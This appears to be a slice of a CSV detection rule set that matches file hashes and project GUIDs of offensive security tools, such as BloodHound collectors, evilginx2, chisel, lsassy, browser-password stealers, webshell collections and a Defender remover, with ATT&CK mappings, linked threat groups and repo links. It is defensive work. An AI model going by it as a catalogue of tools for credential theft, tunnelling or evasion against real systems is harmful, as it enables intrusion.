"*22379d19123e498aef75b4ed162a7c94361c1c23745cbae792e2242540997a61*",".{0,1000}22379d19123e498aef75b4ed162a7c94361c1c23745cbae792e2242540997a61.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","23197"
"*22379d69fa7ac3ae6679aba9a2346d5e66e819384641782e033f4a6efc4097c3*",".{0,1000}22379d69fa7ac3ae6679aba9a2346d5e66e819384641782e033f4a6efc4097c3.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER","Phishing","https://github.com/An0nUD4Y/evilginx2","1","0","#filehash","N/A","10","","N/A","","","","23198"
"*223c6a71be1b15a6b28dbe13bcb8ed5ca46b71b0e1bc014edbac35e3d61dcfd1*",".{0,1000}223c6a71be1b15a6b28dbe13bcb8ed5ca46b71b0e1bc014edbac35e3d61dcfd1.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","23200"
"*2242362e7144103ecd965687227503de0483d4e7636218b1dd28cc01752bdb0f*",".{0,1000}2242362e7144103ecd965687227503de0483d4e7636218b1dd28cc01752bdb0f.{0,1000}","offensive_tool_keyword","knowsmore","KnowsMore is a swiss army knife tool for pentesting Microsoft Active Directory (NTLM Hashes - BloodHound - NTDS and DCSync).","T1003 - T1098 - T1134 - T1484 - T1178 - T1078","TA0006 - TA0008 - TA0003 - TA0011 - TA0005","N/A","Black Basta","Credential Access","https://github.com/helviojunior/knowsmore","1","0","#filehash","N/A","10","3","223","32","2025-04-14T14:52:09Z","2023-01-09T14:02:37Z","23202"
"*2244c46e179fdec505ac4c6af1725468c69ac6d97526b411ff251098c35948a8*",".{0,1000}2244c46e179fdec505ac4c6af1725468c69ac6d97526b411ff251098c35948a8.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1087.001 - T1087.002 - T1482 - T1016 - T1018 - T1046","TA0007 - TA0043 - TA0005 - TA0042","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - TA2101 - Wizard Spider - Grim Spider - Lunar Spider - Dispossessor","Discovery","https://github.com/BloodHoundAD/SharpHound","1","0","#filehash","N/A","N/A","10","904","195","2025-04-18T20:45:04Z","2021-07-12T17:07:04Z","23203"
"*224d47658e0e7ddc256eb97725179a35e42fed02f7717cf5b62afbae26dcb36b*",".{0,1000}224d47658e0e7ddc256eb97725179a35e42fed02f7717cf5b62afbae26dcb36b.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1087.001 - T1087.002 - T1482 - T1016 - T1018 - T1046","TA0007 - TA0043 - TA0005 - TA0042","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - TA2101 - Wizard Spider - Grim Spider - Lunar Spider - Dispossessor","Discovery","https://github.com/BloodHoundAD/SharpHound","1","0","#filehash","N/A","N/A","10","904","195","2025-04-18T20:45:04Z","2021-07-12T17:07:04Z","23205"
"*2251b9a7c19ed7f416bdabc535c42682d838e512feef856e7e42c97287a6cd8e*",".{0,1000}2251b9a7c19ed7f416bdabc535c42682d838e512feef856e7e42c97287a6cd8e.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1087.001 - T1087.002 - T1482 - T1016 - T1018 - T1046","TA0007 - TA0043 - TA0005 - TA0042","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - TA2101 - Wizard Spider - Grim Spider - Lunar Spider - Dispossessor","Discovery","https://github.com/BloodHoundAD/SharpHound","1","0","#filehash","N/A","N/A","10","904","195","2025-04-18T20:45:04Z","2021-07-12T17:07:04Z","23207"
"*2257aeb5d063b08394d05286d7d9adfb5850571ea4ffff9ec3d06eb5af75f0e9*",".{0,1000}2257aeb5d063b08394d05286d7d9adfb5850571ea4ffff9ec3d06eb5af75f0e9.{0,1000}","offensive_tool_keyword","Eventlogedit-evtx--Evolution","","T1070.001 - T1564.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/3gstudent/Eventlogedit-evtx--Evolution","1","0","#filehash","N/A","9","3","267","62","2021-04-17T01:28:00Z","2018-06-05T01:21:20Z","23208"
"*225ae3f948ca67c0f37ad69a5ce542c27c370993806599aeb927079bf8553acb*",".{0,1000}225ae3f948ca67c0f37ad69a5ce542c27c370993806599aeb927079bf8553acb.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","23209"
"*2260d4489a10ffc6b950e15a2a30ce95e644c891393b8ad1378f71e1cb2e52b5*",".{0,1000}2260d4489a10ffc6b950e15a2a30ce95e644c891393b8ad1378f71e1cb2e52b5.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","23210"
"*226665adcfee00d7db13e8e27e1ab21560a8f9dbe581adb42ea2474d84171349*",".{0,1000}226665adcfee00d7db13e8e27e1ab21560a8f9dbe581adb42ea2474d84171349.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","23213"
"*2273ad36e35b7acbbc7ff15649c2ed3683c7d1c35f12f33e41019744be19029a*",".{0,1000}2273ad36e35b7acbbc7ff15649c2ed3683c7d1c35f12f33e41019744be19029a.{0,1000}","offensive_tool_keyword","SharpPack","collection of C# tools that include functionalities like Kerberoasting - ticket manipulation - Mimikatz - privilege escalation - domain enumeration and more","T1558.003 - T1003 - T1059.004 - T1078 - T1212 - T1087 - T1016 - T1071 - T1555 - T1203","TA0003 - TA0004 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/Lexus89/SharpPack","1","0","#filehash","N/A","10","1","78","19","2019-08-12T13:25:25Z","2018-10-01T12:45:16Z","23216"
"*2273f47d253c1974f82b9b7f9018228080e8ac41b75bba4e779fe9f918d72aa1*",".{0,1000}2273f47d253c1974f82b9b7f9018228080e8ac41b75bba4e779fe9f918d72aa1.{0,1000}","offensive_tool_keyword","SharpDecryptPwd","Decrypt Navicat,Xmanager,Filezilla,Foxmail,WinSCP,etc","T1003.008 - T1555.004 - T1552.002","TA0006","N/A","N/A","Credential Access","https://github.com/RowTeam/SharpDecryptPwd","1","0","#filehash","N/A","10","8","769","117","2022-03-04T02:49:31Z","2022-02-25T11:21:43Z","23217"
"*227c72ed-494a-4d29-9170-5e5994c12f5c*",".{0,1000}227c72ed\-494a\-4d29\-9170\-5e5994c12f5c.{0,1000}","offensive_tool_keyword","POC","Windows Privilege escalation POC exploitation for CVE-2024-49138","T1068 - T1058 - T1203","TA0004","N/A","N/A","Privilege Escalation","https://github.com/emdnaia/CVE-2024-49138-POC","1","0","#GUIDproject","N/A","9","1","1","0","2025-01-15T01:01:21Z","2025-01-15T02:11:49Z","23218"
"*227cc3d2c07ef203c39afe00c81943cf245d626c1efa1b32024d7229604635e5*",".{0,1000}227cc3d2c07ef203c39afe00c81943cf245d626c1efa1b32024d7229604635e5.{0,1000}","offensive_tool_keyword","RdpStrike","Positional Independent Code to extract clear text password from mstsc.exe using API Hooking via HWBP","T1081 - T1055.011 - T1012 - T1113 - T1040 - T1185","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/0xEr3bus/RdpStrike","1","0","#filehash","N/A","10","3","238","27","2024-06-11T19:40:05Z","2024-06-11T19:31:50Z","23219"
"*227f0eeb2991708692c78418ff7e45562670a00f6a72a4157adcc28d5f2f5b4f*",".{0,1000}227f0eeb2991708692c78418ff7e45562670a00f6a72a4157adcc28d5f2f5b4f.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","23220"
"*227f64a66fdac6a31e3bd7f7f18232e99464008b66cd7c6163441540eaecdfcb*",".{0,1000}227f64a66fdac6a31e3bd7f7f18232e99464008b66cd7c6163441540eaecdfcb.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0007","N/A","N/A","Discovery","https://github.com/lkarlslund/ldapnomnom","1","0","#filehash","N/A","6","10","1030","80","2024-11-09T10:15:13Z","2022-09-18T10:35:09Z","23221"
"*228e75216d4b2482e113e36823f9367ed46eae2d63a083c915bc282b709e758f*",".{0,1000}228e75216d4b2482e113e36823f9367ed46eae2d63a083c915bc282b709e758f.{0,1000}","offensive_tool_keyword","BrowserGhost","This is a tool for grabbing browser passwords","T1555.003 - T1555.013 - T1003.008","TA0006","N/A","N/A","Credential Access","https://github.com/QAX-A-Team/BrowserGhost","1","0","#filehash","N/A","10","10","1414","206","2022-05-21T14:09:45Z","2020-06-12T12:19:06Z","23222"
"*228eb663a1c8bfc0f6a05ba522038844c762319961b07e5b623dcfa8e30ce5fa*",".{0,1000}228eb663a1c8bfc0f6a05ba522038844c762319961b07e5b623dcfa8e30ce5fa.{0,1000}","offensive_tool_keyword","Shwmae","Shwmae is a tool focused on Windows Hello and DPAPI exploitation. It enables the enumeration - extraction and manipulation of Windows Hello keys and credentials","T1068 - T1078 - T1211 - T1003.004 - T1003.005 - T1003.002","TA0006 - TA0005 - TA0003  - TA0004","N/A","N/A","Credential Access","https://github.com/CCob/Shwmae","1","0","#filehash","N/A","7","2","149","12","2025-01-27T14:36:07Z","2024-03-21T15:05:03Z","23223"
"*2297A528-E866-4056-814A-D01C1C305A38*",".{0,1000}2297A528\-E866\-4056\-814A\-D01C1C305A38.{0,1000}","offensive_tool_keyword","PrivFu","PoCs for sensitive token privileges such SeDebugPrivilege","T1068 - T1134 - T1134.001 - T1078 - T1059","TA0004 - TA0009 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu","1","0","#GUIDproject","PrivilegedOperations","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","23224"
"*2297be424ff20b0f2e6fdae7e2929014a7eae91cf1743d929c889627a2aae2dd*",".{0,1000}2297be424ff20b0f2e6fdae7e2929014a7eae91cf1743d929c889627a2aae2dd.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1087.001 - T1087.002 - T1482 - T1016 - T1018 - T1046","TA0007 - TA0043 - TA0005 - TA0042","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - TA2101 - Wizard Spider - Grim Spider - Lunar Spider - Dispossessor","Discovery","https://github.com/BloodHoundAD/SharpHound","1","0","#filehash","N/A","N/A","10","904","195","2025-04-18T20:45:04Z","2021-07-12T17:07:04Z","23225"
"*22986734a47c09453ffda17227be0a2bc1ab4875aca8ad84444a603577afb646*",".{0,1000}22986734a47c09453ffda17227be0a2bc1ab4875aca8ad84444a603577afb646.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","#filehash","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","23226"
"*22A156EA-2623-45C7-8E50-E864D9FC44D3*",".{0,1000}22A156EA\-2623\-45C7\-8E50\-E864D9FC44D3.{0,1000}","offensive_tool_keyword","SharpPack","collection of C# tools that include functionalities like Kerberoasting - ticket manipulation - Mimikatz - privilege escalation - domain enumeration and more","T1558.003 - T1003 - T1059.004 - T1078 - T1212 - T1087 - T1016 - T1071 - T1555 - T1203","TA0003 - TA0004 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/Lexus89/SharpPack","1","0","#GUIDproject","N/A","10","1","78","19","2019-08-12T13:25:25Z","2018-10-01T12:45:16Z","23228"
"*22A156EA-2623-45C7-8E50-E864D9FC44D3*",".{0,1000}22A156EA\-2623\-45C7\-8E50\-E864D9FC44D3.{0,1000}","offensive_tool_keyword","SharpView","C# implementation of harmj0y's PowerView","T1018 - T1482 - T1087.002 - T1069.002","TA0007 - TA0003 - TA0001","N/A","Conti - APT29","Discovery","https://github.com/tevora-threat/SharpView/","1","0","#GUIDproject","N/A","10","10","1032","196","2024-03-22T16:34:09Z","2018-07-24T21:15:04Z","23229"
"*22ad6469693f482c5ece8da4241b4c0e6e1d22f2a99b5efeba8a5e96e16d1410*",".{0,1000}22ad6469693f482c5ece8da4241b4c0e6e1d22f2a99b5efeba8a5e96e16d1410.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","23230"
"*22bb4f8fe6d57072e57342b605ec5ad9e08c4489c3b6849f2928bdf7ea23ca45*",".{0,1000}22bb4f8fe6d57072e57342b605ec5ad9e08c4489c3b6849f2928bdf7ea23ca45.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","23232"
"*22c276ff5b6b7158990cbeddea6368894e0b4477c11ea714b8b30401096f92df*",".{0,1000}22c276ff5b6b7158990cbeddea6368894e0b4477c11ea714b8b30401096f92df.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","23234"
"*22c75c356f7e3a118f3fb98fe16c5c9232e3834e631ea1bb2af6a923f57b7b0b*",".{0,1000}22c75c356f7e3a118f3fb98fe16c5c9232e3834e631ea1bb2af6a923f57b7b0b.{0,1000}","offensive_tool_keyword","passwordfox","recovery tool that allows you to view the user names and passwords stored by Mozilla Firefox","T1555.003 - T1003 - T1083","TA0006 ","N/A","LockBit - GoGoogle - 8BASE - XDSpy","Credential Access","https://www.nirsoft.net/utils/passwordfox.html","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A","23236"
"*22c8f466cbb5c2845a9f943374032a476ed03ef4ff0b8398012554e0109e5849*",".{0,1000}22c8f466cbb5c2845a9f943374032a476ed03ef4ff0b8398012554e0109e5849.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","23238"
"*22da237375fe569c7cb42482b9c3a8266d138a6174253ec5652ef6cd5ecc955b*",".{0,1000}22da237375fe569c7cb42482b9c3a8266d138a6174253ec5652ef6cd5ecc955b.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#filehash","N/A","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","23241"
"*22df0e3fcbba509c1e28a0df720e8a36b62f731ee3bf6066dbd2d6ed09592052*",".{0,1000}22df0e3fcbba509c1e28a0df720e8a36b62f731ee3bf6066dbd2d6ed09592052.{0,1000}","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/login-securite/lsassy","1","0","#filehash","N/A","10","10","2105","251","2024-12-31T11:56:19Z","2019-12-03T14:03:41Z","23243"
"*22eb92e656efbf120016e4483ae92a7accfb20c307faf7b17debf52da27277ca*",".{0,1000}22eb92e656efbf120016e4483ae92a7accfb20c307faf7b17debf52da27277ca.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","23246"
"*22ebd5b1976f3135b19ba715edef95821cf7990bb2670f2359f0137bc01f35ac*",".{0,1000}22ebd5b1976f3135b19ba715edef95821cf7990bb2670f2359f0137bc01f35ac.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","23247"
"*22ee00e26aed0e9dc83b202584c5f8ea81147c64d85233d1ae6b5929c8351ed5*",".{0,1000}22ee00e26aed0e9dc83b202584c5f8ea81147c64d85233d1ae6b5929c8351ed5.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","0","#filehash","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","23248"
"*22f3cfc7bd97c20e7a313b9710a41426f42fcbf4bb6dbe108a36c92c328737a4*",".{0,1000}22f3cfc7bd97c20e7a313b9710a41426f42fcbf4bb6dbe108a36c92c328737a4.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","#filehash","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","23249"
"*22f6a8fb8771a0ed253a3652c6852a831b4919b2a677ddb6a6d03cad6a0f76f6*",".{0,1000}22f6a8fb8771a0ed253a3652c6852a831b4919b2a677ddb6a6d03cad6a0f76f6.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","23250"
"*22f7e0f4c88ff065df8e983b5cd2bb1cb7e218e7eddbf34a950711cff3657dc9*",".{0,1000}22f7e0f4c88ff065df8e983b5cd2bb1cb7e218e7eddbf34a950711cff3657dc9.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","23251"
"*22f7fe7f3c58f04ba3e26f3b779dd14bfed6aff19d4d9e6fa290ae2ce0d71f51*",".{0,1000}22f7fe7f3c58f04ba3e26f3b779dd14bfed6aff19d4d9e6fa290ae2ce0d71f51.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","23252"
"*22fb8aa73c70f98115846b88d6dba267df70e65ed16fe26d0241b206864537f0*",".{0,1000}22fb8aa73c70f98115846b88d6dba267df70e65ed16fe26d0241b206864537f0.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","23253"
"*22fdc29d790bb072a0bd54651adab4892fb1df1c75fb44388c3d6a0b0506d908*",".{0,1000}22fdc29d790bb072a0bd54651adab4892fb1df1c75fb44388c3d6a0b0506d908.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","23254"
"*22fe06596a11d40b5607f1d7a51a5a6655aa33b63693e0499a0d8b03276e44f5*",".{0,1000}22fe06596a11d40b5607f1d7a51a5a6655aa33b63693e0499a0d8b03276e44f5.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","23255"
"*230184a9e6df447df04c22c92e6cb0d494d210fb6ec4b3350d16712d1e85d6b9*",".{0,1000}230184a9e6df447df04c22c92e6cb0d494d210fb6ec4b3350d16712d1e85d6b9.{0,1000}","offensive_tool_keyword","NtlmThief","Extracting NetNTLM without touching lsass.exe","T1558.003 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/MzHmO/NtlmThief","1","0","#filehash","N/A","10","3","235","33","2023-11-27T14:50:10Z","2023-11-26T08:14:50Z","23256"
"*2301aca49d1e6f829a8859b41ea4decd4fb0451691733859018646bf047164f6*",".{0,1000}2301aca49d1e6f829a8859b41ea4decd4fb0451691733859018646bf047164f6.{0,1000}","offensive_tool_keyword","sgn","polymorphic encoder used in  to obfuscate payloads","T1027","TA0005","N/A","N/A","Defense Evasion","https://github.com/EgeBalci/sgn","1","0","#filehash","N/A","8","10","1681","224","2024-02-22T17:35:59Z","2019-10-30T10:20:01Z","23257"
"*2305237cb1b9b2320b7e62741e4a8835777462f59c9584dbcfd0672e6f2c8150*",".{0,1000}2305237cb1b9b2320b7e62741e4a8835777462f59c9584dbcfd0672e6f2c8150.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","#filehash","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","23258"
"*2308bdcf6b10c8d36213bbb8afba67549558c4cd9b112493b9e9d4b7e2d365ca*",".{0,1000}2308bdcf6b10c8d36213bbb8afba67549558c4cd9b112493b9e9d4b7e2d365ca.{0,1000}","offensive_tool_keyword","Invoke-ArgFuscator","generate obfuscated command-lines for common system-native executables","T1027 - T1059 - T1202","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/wietze/Invoke-ArgFuscator","1","0","#filehash","N/A","10","2","161","28","2025-04-14T21:24:29Z","2022-11-20T17:59:23Z","23259"
"*23092e288c27221ba793178e177a04309cf5c6073e2a022f5c4035252d69086d*",".{0,1000}23092e288c27221ba793178e177a04309cf5c6073e2a022f5c4035252d69086d.{0,1000}","offensive_tool_keyword","htran","proxies connections through intermediate hops and aids users in disguising their true geographical location. It can be used by adversaries to hide their location when interacting with the victim networks","T1055 - T1090 - T1014","TA0003 - TA0005 - TA0011","N/A","GALLIUM - APT10 - APT12 - Deep Panda - MenuPass","C2","https://github.com/HiwinCN/Htran","1","0","#filehash","N/A","9","10","256","88","2021-04-25T09:57:46Z","2015-12-03T04:54:53Z","23260"
"*2309aee5d6244b80e7b1f98d62c87d68e97e0acaf233688af07b6a8439f85b7d*",".{0,1000}2309aee5d6244b80e7b1f98d62c87d68e97e0acaf233688af07b6a8439f85b7d.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","23261"
"*23169d2107567f31b9cde9d04b8a9aeee99c34dc3261c81fd7a897a603ec4606*",".{0,1000}23169d2107567f31b9cde9d04b8a9aeee99c34dc3261c81fd7a897a603ec4606.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","23262"
"*231df570906bdb24f33a92f48448f5ebf4c648fd71c6977956a58adae14aebbc*",".{0,1000}231df570906bdb24f33a92f48448f5ebf4c648fd71c6977956a58adae14aebbc.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","23263"
